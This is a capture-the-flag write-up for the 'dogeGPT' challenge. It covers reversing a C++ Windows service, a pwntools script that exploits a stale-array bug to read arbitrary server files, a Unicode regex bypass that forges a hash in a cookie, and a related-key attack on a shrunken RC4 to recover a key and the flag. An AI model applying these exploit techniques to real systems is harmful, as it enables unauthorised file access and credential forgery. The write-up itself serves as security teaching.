Skip to content

Level 10: dogeGPT (rev, pwn, web, crypto)

After registering at the challenge website, we are redirected to /start.php, which contains a button which we can use to start the dogeGPT service, which is accessible via a TCP connection.

image-20231005181149360

The service allows us to start a chat and enter a prompt, which 'dogeGPT' will respond to.

image-20231005181048353

We can also display a help menu, but it seems useless. There is also an option to get dogekey, but it doesn't seem to do anything.

image-20231005181011489

Digging deeper into start.php, we find a HTML comment referencing a 'files.php' endpoint and a 'decrypt-flag.php' endpoint.

html
<!-- 
    lol i forgot to delete a comment 
    <a href="/files.php">Download dogeGPT here!</a><br><br>
    <a href="/decrypt-flag.php">Shutdown dogeGPT and retrieve flag here :(</a>
 -->

Heading over to /files.php, we can download the dogeGPT.exe binary. The /files.php endpoint also leaks the location of the source code as C:\lmao\weird\folder\htdocs\files.php via an error message.

image-20231005181307406

Inspecting cookies, we can observe that a cookie u is set. It's value appears to be

py
base64_encode(username + "\x80" + md5_hex(username)[:16])

For example, registering as admin gives YWRtaW6AMjEyMzJmMjk3YTU3YTVhNw== which decodes to admin\x8021232f297a57a5a7.

Rev

Opening up the dogeGPT.exe binary in IDA, we quickly realize that it is a C++ executable (the .i64 file can be found here). I'll be referring to functions and global variables as I named them in IDA.

We define the following structs in IDA to help us better understand the code:

c
struct cpp_str {
    char* ptr;
    char extra_data[8];
    long length;
    long capacity;
};

If the length of the string is less than 16 bytes, it is stored in the ptr and extra_data fields. If it's at least 16 bytes, the string is stored in the heap and a reference to it is stored in ptr.

c
struct cpp_str_arr {
    cpp_str* start;
    cpp_str* end;
    cpp_str* limit;
};

This struct functions like a resizable array. If end == limit, then the array is reallocated to accommodate more cpp_strs.

After some debugging and trial and error, I realized that the program required 4 arguments. The second argument is the IP to accept connections from, and the fourth is the port to listen on.

The purpose of the first and third arguments will be discussed later.

Tracing the execution flow for input get dogekey leads us to read_keyfile.

c
cpp_str *__fastcall read_keyfile(cpp_str *output)
{
  cpp_str *v2; // rax
  cpp_str *v3; // rax
  __int64 v4; // rdx
  cpp_str *v5; // rax
  cpp_str *v6; // rax
  char *ptr; // rcx
  char *v8; // rcx
  cpp_str Block; // [rsp+20h] [rbp-78h] BYREF
  cpp_str *v11; // [rsp+48h] [rbp-50h]
  cpp_str v12; // [rsp+50h] [rbp-48h] BYREF
  cpp_str v13; // [rsp+70h] [rbp-28h] BYREF

  v11 = output;
  if ( key_flag )
  {
    v2 = copy(&v13, &key_filename);
    v3 = read_whole_file(&v12, (__int64)v2);
    v5 = concat2(v3, v4, "Congrats! The dogekey has been encrypted! It is: ", 0x31ui64);
    memset(&Block, 0, sizeof(Block));
    Block = *v5;
    v5->length = 0i64;
    v5->cap = 15i64;
    LOBYTE(v5->ptr) = 0;
    v6 = append(&Block, "\n", 1ui64);
    // output 
  }
  else
  {
    *(_OWORD *)&output->ptr = 0i64;
    output->length = 0i64;
    output->cap = 0i64;
    append_str(output, "\n", 1ui64);
  }
  return output;
}

If the key_flag global variable is not set, the function returns an empty string, which explains why nothing seems to be happening when we enter get dogekey. If key_flag is set, the file referenced by key_filename is read and the contents sent to the user.

Searching for references to key_flag leads us to this fragment of code in print_doge:

c
v6 = copy(&out, input);  
hash(&v163, (__int64)v6);
last = get_first_(&v163, &hash_subset, 0i64, 0x10ui64);
v8 = memcmp_hash(last);
reset_str(&hash_subset);
v9 = key_flag;
if ( v8 )
	v9 = 1;
key_flag = v9;

hash performs a md5 hash on the input and writes the hex encoded hash to v163. get_first then extracts the first 0x10 characters from the hash into hash_subset . memcmp_hash compares the computed hash with the third argument to the program (stored in the global variable hash_val).

Hmm, this seems quite similar to the u cookie we discovered earlier, which contains the first 16 characters of the md5 hash of our username. Maybe hash_val is also the first 16 characters of the md5 hash of our username?

This is proven correct when we enter our username, followed by get dogekey. The string Congrats! The dogekey has been encrypted! It is: is printed, indicating that key_flag had been set.

However, the dogekey has still not been revealed. This is because the key_filename variable has not been set. Searching for references to key_filename, we find the gen_keyfilename function which is called in print_doge:

c
if ( (unsigned __int16)result_accumulator == (_DWORD)v159 )
	gen_keyfilename(v140, v139, v141);

Using a debugger, we can observe that result_accumulator is initialized to 0xd06e and v159 is the integer value represented by the last 4 hex characters of hash_val (which is the first 16 characters of the md5 hash of our username).

Searching for references to result_accumulator leads us to spawn_process, where our input is passed to the C:\dogeGPT\parser.py program:

c
join(
    &lpCommandLine,
    (__int64)input,
    a3,
    "C:\\Progra~1\\Python311\\python.exe c:\\dogeGPT\\parser.py ",
    0x36ui64,
    ptr,
    input->length
);

// ...

if ( !CreateProcessA(0i64, p_lpCommandLine, 0i64, 0i64, 1, 0x10u, 0i64, 0i64, &StartupInfo, &ProcessInformation) )
{
  CloseHandle(hWritePipe);
  CloseHandle(hReadPipe);
LABEL_5:
  v6 = 0i64;
  goto LABEL_6;
}

The output of the process is then parsed:

c
if ( Buf.length && (v16 = memchr(process_output, ',', Buf.length)) != 0i64 )
  comma_index = (_DWORD)v16 - (_DWORD)process_output;
else
  comma_index = -1;
v18 = (char *)&Buf;
if ( Buf.cap >= 0x10ui64 )
  v18 = Buf.ptr;
if ( length && (v19 = memchr(v18, '\r', length)) != 0i64 )
  newline_index = (_DWORD)v19 - (_DWORD)v18;
else
  newline_index = -1;
if ( comma_index && newline_index )
{
  memset(&v48, 0, sizeof(v48));
  v21 = comma_index;
  if ( length < comma_index )
    v21 = length;
  v22 = (char *)&Buf;
  if ( Buf.cap >= 0x10ui64 )
    v22 = Buf.ptr;
  append_str(&v48, v22, v21);
  after_comma = comma_index + 1;
  memset(&String, 0, sizeof(String));
  if ( Buf.length < after_comma )
    invalid_strpos();
  num_len = newline_index - comma_index - 1;
  if ( Buf.length - after_comma < num_len )
    num_len = Buf.length - after_comma;
  buf_ptr = (char *)&Buf;
  if ( Buf.cap >= 0x10ui64 )
    buf_ptr = Buf.ptr;
  append_str(&String, &buf_ptr[after_comma], num_len);
  v26 = errno();
  v27 = v26;
  p_String = (char *)&String;
  if ( String.cap >= 0x10ui64 )
    p_String = String.ptr;
  *v26 = 0;
  v29 = strtol(p_String, (char **)NumberOfBytesRead, 10);
  if ( p_String == *(char **)NumberOfBytesRead )
  {
    std::_Xinvalid_argument("invalid stoi argument");
    __debugbreak();
  }
  if ( *v27 == 34 )
  {
    std::_Xout_of_range("stoi argument out of range");
    __debugbreak();
  }
  result_accumulator += v29;
  // ...
}

Here's a Python implementation of that long, confusing chunk of code:

python
s, i = process_output.split(",")[:2]
result_accumulator += int(i)

From this, we can infer that parser.py outputs something in the form of string,integer. The integer portion of the output is parsed and added to result_accumulator. It seems that the string portion of the output is our input string. Therefore, if our input string contains a , character followed by an integer, we can control the value of v29 and thus the value of result_accumulator. Since we know the target value that result_accumulator needs to be and the initial value, we can calculate the input required to reach the target.

I wrote a script to generate inputs that achieve both conditions of setting key_flag and key_filename:

python
from pwn import *

import random
def get5():
    return b"".join([random.choice(string.ascii_letters).encode() for _ in range(5)])

def gen(a):
    h = md5sum(a).hex()[:16]
    h = int(h[-4:],16)
    if h < 0xd06e:
        return False
    return md5sum(a).hex()[:16], a, f"awyuyruyuyrueure,{h-0xd06e}"

def gen_rnd():
    res = False
    while not res:
        x = get5()
        res = gen(x+b",0")
    return res

One possible input combination is username = lUArf,0 and subsequent input awyuyruyuyrueure,7689. Since the first 16 characters of the md5 hash of lUArf,0 is ec6b23e906d9ee77 and 7689 + 0xd06e = 0xee77, gen_keyfilename function will be called. The username needs to end in ,0 to avoid affecting the result_accumulator.

Entering lUArf,0 and awyuyruyuyrueure,7689 after registering as lUArf,0 results in the dogekey being printed, but unfortunately this doesn't bring us much closer to the flag.

get dogekey
Congrats! The dogekey has been encrypted! It is: 89abe660cba142e3e8b2861ca5e8b81a

Upon further debugging, it appears that the dogekey is the first argument of the binary and is written to C:\dogeGPT\<ip>-<username hash> when the gen_keyfilename function is called.

Pwn

After a week of reversing and debugging the binary, I noticed a very strange behavior. In the start_server function, the load_files function is called when the user connects to the dogeGPT process. This loads the filenames of the help file and the path of the wordlists used to generate dogeGPT responses into a global filenames variable (which is a cpp_str_arr):

image-20231004114434222

Interestingly, in the process_input function, user input is also appended to this array, even though it is not a filename:

c
if ( filenames.end == filenames.limit )
{
    copy_with_resize(&filenames, filenames.end, input);
    end = filenames.end;
}
else
{
    copy(filenames.end, input);
    end = ++filenames.end;
}

This results in filenames being a mix of user input and actual filenames:

image-20231004114707415

Upon ending chat, the filenames array is reset:

c
if ( filenames.start != end )
{
  delete_string_range(filenames.start, end);
  filenames.end = filenames.start;
}
files_loaded = 0;
cleanup_keyfile();
v18 = 15i64;
v19 = "Ending chat...\n";

However, the help menu still functions even if the chat is ended.

c
v8 = copy(&v26, filenames.start);
v9 = read_whole_file(&Block, (__int64)v8);
v10 = append(v9, "\n", 1ui64);
*(_OWORD *)&output->ptr = 0i64;
output->length = 0i64;
output->cap = 0i64;
*output = *v10;

Interestingly, it reads and returns the contents of the file referenced by filenames.start to the user. This works because help.txt is the first file that's loaded.

However, since the filenames array was reset when the chat was ended, filenames.start no longer contains help.txt but our user input! Therefore, we can trick the program into exposing arbitrary files.

We can use this vulnerability to expose parser.py as well as start.php that is responsible for starting the dogeGPT service:

py
r = remote(ip, int(port))

path = r"C:\lmao\weird\folder\htdocs\start.php"
r.sendline("end chat")
r.sendlineafter("...", path)
r.sendlineafter("...", "help")
pause(1)
data = r.clean()
print(data.decode())

Web

After leaking index.php using the bug described in the previous section, we find the following code used to generate the u cookie:

php
$str = $_POST['uname'];
if (!preg_match("/[\p{N}\p{Z}\p{L}\p{M}]*/u",$str) || $str == "") {
    echo("Bad username!!<br>");
    die();
}
$h = substr(md5($str),0,16);
$uid = base64_encode($str . "\x80" . $h);
setcookie("u", $uid, time()+60);

As expected, uid is a base64 string consisting of the username concatenated with \x80 and the first 16 characters of the md5 hash of the username.

Using regex101 to explain the regex, it seems that \p{L} matches 'any kind of letter from any language'. Luckily, the unicode code point 0xff80 is タ, which is HALFWIDTH KATAKANA LETTER TA, so this passes the regex. However, this also allows us to inject the \x80 character, which allows us to supply a fake md5 hash. To see how this is important, let's look at start.php:

php
$aa = explode("\x80", base64_decode($uid));
if (!preg_match("/^[\da-f]+$/u",$aa[1])) {
    header("Location: /");
    die();
}
$uid = substr($aa[1],0,16);
exec("reg query HKCU\dogeGPT\ -v pri_key", $a1);
$pri = explode("    ", $a1[2])[3];

exec("reg query HKCU\dogeGPT\ -v dogekey", $a2);
$f = explode("    ", $a2[2])[3];        

$ef = enc($pri, $uid, $f);

$ip = $_SERVER['REMOTE_ADDR'];
$pt = rand(20000, 47000);
proc_open("C:\\dogeGPT\\dogeGPT.exe " . $ef . " " . $ip . " " . $uid . " " . $pt, [0=>["pipe","r"]], $p);

The $uid is used as an input to the enc function which generates $ef which is used as the 'encrypted dogekey' referred to by dogeGPT.exe. By using the unicode trick explored above, we can set $uid to any 16 character hexadecimal string we want.

Crypto

The enc function is defined in encrypt.php. It's quite long, so here's a simple python implementation:

py
def encrypt(prikey, uid, data):
    sbox = [i for i in range(16)]
    keystream = [(x+y)%16 for x,y in zip(prikey, uid)]
    j = 0
    for i in range(16):
        j = (j + sbox[i] + keystream[i]) % 16
        sbox[i], sbox[j] = sbox[j], sbox[i]

    i= 0
    j = 0
    out = []
    for k in range(len(data)):
        i = (i+1)%16
        j = (j+sbox[i])%16
        sbox[i], sbox[j] = sbox[j], sbox[i]
        keychar = (sbox[i] + sbox[j])%16
        out += ([(data[k]^sbox[keychar])])
    return out

If you're well versed in crypto, you'll recognize this as a variant of RC4, except the sbox has been reduced to 16 hexadecimal numbers (8 bytes) instead of the 256 bytes of full RC4. We are also able to modify the key used to generate the sbox via the supplied uid.

Since I'm quite bad at crypto, I was stuck at this stage for a while, until the challenge author prompted me to explore the system further.

This lead me to look deeper at parser.py:

python
import sys
import requests
import openai

text = ""
for i in range(len(sys.argv)):
	if i > 0: 
		text = text + sys.argv[i] + " "

response = openai.ChatComplete.create(model="doge-gpt-0.1", messages=text)
c = 0
if len(response) != 0:
	for i in range(requests.get_len() // len(text)):
		if requests.is_sus(i):
			c += i
	print(response[c % len(response)]+","+str(c))
else:
	print(",0")

Obviously, requests is not the real requests library, since the real library doesn't have a requests.is_sus method. Reading the requests.py file revealed the following QR code:

py
m  = "@@@@@@@  @@  @  @     @@@@@@@"
m += "@     @ @@ @  @@@@ @  @     @"
m += "@ @@@ @   @  @@ @ @   @ @@@ @"
m += "@ @@@ @  @ @ @@@ @@@@ @ @@@ @"
m += "@ @@@ @ @  @@ @  @@@  @ @@@ @"
m += "@     @    @ @   @@@  @     @"
m += "@@@@@@@ @ @ @ @ @ @ @ @@@@@@@"
m += "         @@  @@ @@ @         "
m += "@ @ @ @   @@@ @@ @ @    @  @ "
m += "@@ @@   @ @   @@  @ @ @  @  @"
m += "  @ @@@@ @ @ @   @@  @@ @ @@@"
m += "   @   @       @ @         @ "
m += "@ @@  @    @@   @@  @ @@ @ @@"
m += "     @ @@  @ @ @@@@@@@@  @  @"
m += "@@ @ @@@@@@@  @@@@   @ @@@ @@"
m += "@@   @ @@ @@ @@ @@@ @@@  @ @ "
m += "@ @@  @     @ @@    @@@@ @ @@"
m += " @@ @     @@@ @@   @@@@  @@ @"
m += "@ @ @@@   @@ @   @  @ @@   @@"
m += " @@ @      @   @ @@  @@ @@ @ "
m += "@  @ @@ @@@ @   @@@ @@@@@    "
m += "        @@   @ @@ @ @   @ @@@"
m += "@@@@@@@    @@ @@@ @@@ @ @@ @@"
m += "@     @   @@ @@ @@  @   @@ @ "
m += "@ @@@ @ @@    @@  @ @@@@@  @ "
m += "@ @@@ @  @    @@    @  @@ @  "
m += "@ @@@ @ @@ @@@   @ @   @@@  @"
m += "@     @  @ @@  @   @@      @ "
m += "@@@@@@@ @   @@@ @   @@@  @ @@"

def is_sus(i):
	return(m[i % len(m)] == "@")

def get_len():
	return(len(m))

A scannable version of the QR code can be found here.

I realized that it would be too expensive to make real requests to OpenAI, so the openai library used must be fake too. Indeed it was:

py
import nltk
import numpy

class ChatComplete:
	def create(model, messages):
		text = nltk.word_tokenize(messages)
		tags = nltk.pos_tag(text)
		stuff = []
		for tag in tags:
			if tag[1] == "NN" or tag[1] == "NNP":
				if numpy.is_sus(len(tag[0])*len(tags)):
					stuff.append(tag[0])
					stuff.append(tag[0])
					stuff.append(tag[0])
				else:
					stuff.append(tag[0])
					stuff.append(tag[0])
			if tag[1] == "VBG" or tag[1] == "JJ":
				if numpy.is_sus(len(tag[0])*len(tags)):
					stuff.append(tag[0])
					stuff.append(tag[0])
				else:
					stuff.append(tag[0])
					stuff.append(tag[0])
					stuff.append(tag[0])					
			if tag[1] == "VB":
				if numpy.is_sus(len(tag[0])*len(tags)):
					stuff.append(tag[0])
		return stuff

This revealed the use of the nltk library (which was legitimate) and the numpy library, which contained the following QR code:

python
m  = "@@@@@@@   @ @@    @@@@@@@"
m += "@     @ @ @  @@@@ @     @"
m += "@ @@@ @     @     @ @@@ @"
m += "@ @@@ @ @@@ @@@@@ @ @@@ @"
m += "@ @@@ @  @    @ @ @ @@@ @"
m += "@     @ @@ @@  @@ @     @"
m += "@@@@@@@ @ @ @ @ @ @@@@@@@"
m += "         @@@   @@        "
m += "@@@@@ @@@@ @ @@@@@ @ @ @ "
m += " @@@@@ @  @ @   @@ @ @@  "
m += " @ @@ @ @ @   @@@@@  @ @@"
m += "@ @ @@ @@   @    @ @@   @"
m += "   @@@@  @@ @@@@@@@@  @@ "
m += "@@@@@  @@@      @  @   @@"
m += "@ @@@@@@ @@@@@@@@@@@@@ @@"
m += "@ @ @     @@   @@@       "
m += "@  @ @@@  @@    @@@@@@@@ "
m += "        @@  @@ @@   @    "
m += "@@@@@@@ @    @@ @ @ @@  @"
m += "@     @  @  @@ @@   @  @@"
m += "@ @@@ @ @@  @ @@@@@@@@@@@"
m += "@ @@@ @ @@@    @ @@@@ @@@"
m += "@ @@@ @ @@ @@  @   @  @ @"
m += "@     @ @  @  @ @@ @@   @"
m += "@@@@@@@ @@ @      @  @@@@"

def is_sus(i):
	return(m[i % len(m)] == "@")

That QR code decodes to .\htdocs\welp-sus.pdf, which corresponds to http://13.251.171.1/welp-sus.pdf.

That PDF is the first page of A New Practical Key Recovery Attack on the Stream Cipher RC4 under Related-Key Model, which seems to be exactly the attack to use in this case.

My implementation of the attack can be found here: attack.py, worker.py, get_encryption.py. I used 4 worker processes to speed things up and after a couple of hours, the full key was leaked:

[12, 3, 9, 0, 12, 2, 11, 10, 12, 4, 10, 3, 12, 6, 9, 0]

Next, I obtained the encrypted dogekey with uid=0:

9e51eafb37f35cd7b8ada161c19e875c

and decrypted it using the leaked key to reveal the following decrypted dogekey:

600d715cf1a6baadd06e10000d011a55

Reading decrypt-flag.php, it seems that a check has been added to only allow local access:

php
<?php
    if ($_SERVER['REMOTE_ADDR'] != "127.0.0.1") {
        header("HTTP/1.1 401 Unauthorized");
        echo "<h1>401 Unauthorized: Access Denied LMAO</h1>";
        die;
    }
    $flag = "";
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $enc_flag = "cHAwNlJXZ3hYY0V1TmVyK3VacEN2NVdwNUhZRGh2ZFFUa1JQVlp2M1ByWT0=";
        $key = $_POST['dogekey'];
        for ($i = 0; $i < 0xffffff; $i++) {
            $key = hash('sha256', $key);
        }
        $cipher = "aes-256-cbc";

        $flag = openssl_decrypt(base64_decode($enc_flag), $cipher, $key);
    }
?>

If we run a local php web server and visit decrypt-flag.php, we can enter the decrypted dogekey and the flag will be returned:

TISC{5UCH_@I_V3RY_IF_3153_W0W}